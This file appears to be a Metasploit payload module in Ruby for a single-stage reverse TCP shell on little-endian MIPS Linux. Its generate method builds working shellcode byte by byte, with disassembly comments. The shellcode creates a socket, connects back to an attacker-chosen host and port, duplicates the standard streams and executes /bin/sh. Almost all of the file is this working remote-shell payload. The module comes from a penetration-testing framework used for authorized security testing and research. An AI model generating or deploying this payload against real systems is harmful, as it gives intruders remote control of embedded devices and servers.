Path: blob/master/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Inline (single-stage) reverse-TCP command shell for little-endian MIPS Linux.
#
# generate emits a fixed instruction sequence and splices the LHOST/LPORT
# bytes straight into it; no encoder or staging is applied here, so the
# callback endpoint is present verbatim in the output and is trivially
# recoverable from a captured sample.
module MetasploitModule
  # Byte length of the generated payload, as recorded by the framework's
  # payload size cache.
  CachedSize = 184

  include Msf::Payload::Single
  include Msf::Payload::Linux
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata (name, authors, platform/arch, handler
  # and session type). 'Offsets' is left empty because the address and port
  # are inserted by generate rather than patched in by offset.
  #
  # @param info [Hash] metadata overrides merged via merge_info
  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Reverse TCP Inline',
      'Description'   => 'Connect back to attacker and spawn a command shell',
      'Author'        =>
        [
          'rigan <imrigan[at]gmail.com>', # Original (mipsbe) shellcode
          'juan vazquez'                  # Metasploit module
        ],
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_MIPSLE,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShellUnix,
      'Payload'       =>
        {
          'Offsets' => { },
          'Payload' => ''
        })
    )
  end

  # Builds the payload bytes.
  #
  # @param _opts [Hash] unused; kept for the framework's generate(opts)
  #   calling convention.
  # @return [String] the parent's generate output followed by the shellcode
  #   with LHOST/LPORT embedded; when LHOST is unset or empty only the
  #   parent's output is returned, since the callback address cannot be
  #   embedded.
  # @raise [ArgumentError, TypeError] from Integer() when LPORT is not a
  #   valid integer string (or is missing).
  def generate(_opts = {})
    # No address to embed: defer entirely to the parent implementation.
    if( !datastore['LHOST'] or datastore['LHOST'].empty? )
      return super
    end

    host = Rex::Socket.addr_atoi(datastore['LHOST'])
    port = Integer(datastore['LPORT'])

    # Pack the address big-endian ("N", network order) and the port as a
    # big-endian 16-bit value ("n"), then split each into individual signed
    # bytes. The signed unpack is harmless: the bytes are re-packed with "C2"
    # below, which keeps only the low 8 bits of each value.
    host = [host].pack("N").unpack("cccc")
    port = [port].pack("n").unpack("cc")

    # Each 4-byte instruction below is written least-significant byte first
    # (ARCH_MIPSLE). The 16-bit immediate of lui/ori is the low half-word of
    # the MIPS I-type encoding, which is why the packed port/address bytes
    # precede the "\x0e\x3c" / "\xce\x35" opcode halves. The immediates shown
    # in those trailing comments (0x1f90, 0x7f01, 0x101) are sample values
    # from the reference disassembly and are replaced by the packed bytes.
    shellcode =
      # sys_socket
      # a0: domain
      # a1: type
      # a2: protocol
      "\xfa\xff\x0f\x24" +                  # li t7,-6
      "\x27\x78\xe0\x01" +                  # nor t7,t7,zero
      "\xfd\xff\xe4\x21" +                  # addi a0,t7,-3
      "\xfd\xff\xe5\x21" +                  # addi a1,t7,-3
      "\xff\xff\x06\x28" +                  # slti a2,zero,-1
      "\x57\x10\x02\x24" +                  # li v0,4183 # sys_socket
      "\x0c\x01\x01\x01" +                  # syscall 0x40404

      # sys_connect
      # a0: sockfd (stored on the stack)
      # a1: addr (data stored on the stack)
      # a2: addrlen
      "\xff\xff\xa2\xaf" +                  # sw v0,-1(sp)
      "\xff\xff\xa4\x8f" +                  # lw a0,-1(sp)
      "\xfd\xff\x0f\x34" +                  # li t7,0xfffd
      "\x27\x78\xe0\x01" +                  # nor t7,t7,zero
      "\xe2\xff\xaf\xaf" +                  # sw t7,-30(sp)
      # The two LPORT bytes fill the immediate of both lui and ori.
      port.pack("C2") + "\x0e\x3c" +        # lui t6,0x1f90
      port.pack("C2") + "\xce\x35" +        # ori t6,t6,0x1f90
      "\xe4\xff\xae\xaf" +                  # sw t6,-28(sp)
      # Upper address bytes (host[2..3]) go into lui, lower (host[0..1]) into ori.
      host[2..3].pack("C2") + "\x0e\x3c" +  # lui t6,0x7f01
      host[0..1].pack("C2") + "\xce\x35" +  # ori t6,t6,0x101
      "\xe6\xff\xae\xaf" +                  # sw t6,-26(sp)
      "\xe2\xff\xa5\x27" +                  # addiu a1,sp,-30
      "\xef\xff\x0c\x24" +                  # li t4,-17
      "\x27\x30\x80\x01" +                  # nor a2,t4,zero
      "\x4a\x10\x02\x24" +                  # li v0,4170 # sys_connect
      "\x0c\x01\x01\x01" +                  # syscall 0x40404

      # sys_dup2
      # a0: oldfd (socket)
      # a1: newfd (0, 1, 2)
      "\xfd\xff\x11\x24" +                  # li s1,-3
      "\x27\x88\x20\x02" +                  # nor s1,s1,zero
      "\xff\xff\xa4\x8f" +                  # lw a0,-1(sp)
      "\x21\x28\x20\x02" +                  # move a1,s1 # dup2_loop
      "\xdf\x0f\x02\x24" +                  # li v0,4063 # sys_dup2
      "\x0c\x01\x01\x01" +                  # syscall 0x40404
      "\xff\xff\x10\x24" +                  # li s0,-1
      "\xff\xff\x31\x22" +                  # addi s1,s1,-1
      "\xfa\xff\x30\x16" +                  # bne s1,s0,68 <dup2_loop>

      # sys_execve
      # a0: filename (stored on the stack) "//bin/sh"
      # a1: argv "//bin/sh"
      # a2: envp (null)
      "\xff\xff\x06\x28" +                  # slti a2,zero,-1
      "\x62\x69\x0f\x3c" +                  # lui t7,0x2f2f "bi"
      "\x2f\x2f\xef\x35" +                  # ori t7,t7,0x6269 "//"
      "\xec\xff\xaf\xaf" +                  # sw t7,-20(sp)
      "\x73\x68\x0e\x3c" +                  # lui t6,0x6e2f "sh"
      "\x6e\x2f\xce\x35" +                  # ori t6,t6,0x7368 "n/"
      "\xf0\xff\xae\xaf" +                  # sw t6,-16(sp)
      "\xf4\xff\xa0\xaf" +                  # sw zero,-12(sp)
      "\xec\xff\xa4\x27" +                  # addiu a0,sp,-20
      "\xf8\xff\xa4\xaf" +                  # sw a0,-8(sp)
      "\xfc\xff\xa0\xaf" +                  # sw zero,-4(sp)
      "\xf8\xff\xa5\x27" +                  # addiu a1,sp,-8
      "\xab\x0f\x02\x24" +                  # li v0,4011 # sys_execve
      "\x0c\x01\x01\x01"                    # syscall 0x40404

    return super + shellcode
  end
end